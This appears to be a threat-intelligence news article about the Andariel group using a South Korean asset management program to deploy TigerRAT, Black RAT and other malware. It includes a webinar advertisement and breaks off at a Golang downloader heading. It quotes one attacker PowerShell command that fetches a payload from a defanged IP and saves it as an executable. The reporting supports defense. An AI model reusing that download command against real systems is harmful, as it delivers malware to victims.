Hackers Exploit Asset Management Program to Deploy Malware
The Andariel group has been identified in recent reports as distributing malware through asset management programs. This group has been previously discovered to be in a relationship with the Lazarus group.
The Andariel group is known to launch supply chain, spear phishing, or watering hole attacks as part of their initial access.
The group’s recent targets were Log4Shell and Innorix agents, which were targeted for attacking several corporate sectors in South Korea. In another case, the MS-SQL server was also identified to be targeted for malware attack.
The malware used for attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. Similar to their previous attacks, their primary targets were South Korean communications companies and semiconductor manufacturers.
In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway
Hackers Exploit Asset Management Program
Initial Access
In one case, an asset management program was targeted, which was identified with several logs.
This program was installed with Andariel group’s malware, which used the below PowerShell command for downloading the malware by using the mshta.exe process.
PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe
Malware Used in Attacks
Some of the most used backdoors installed were TigerRAT, Black RAT, and NukeSped.
However, in recent attacks, an Open source malware named Lilith RAT was used. In other cases, malware developed in the Go language was also discovered.
TigerRAT
This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.
This backdoor has an authentication process during initial communications, making it different from other backdoors.
Golang Downloader
…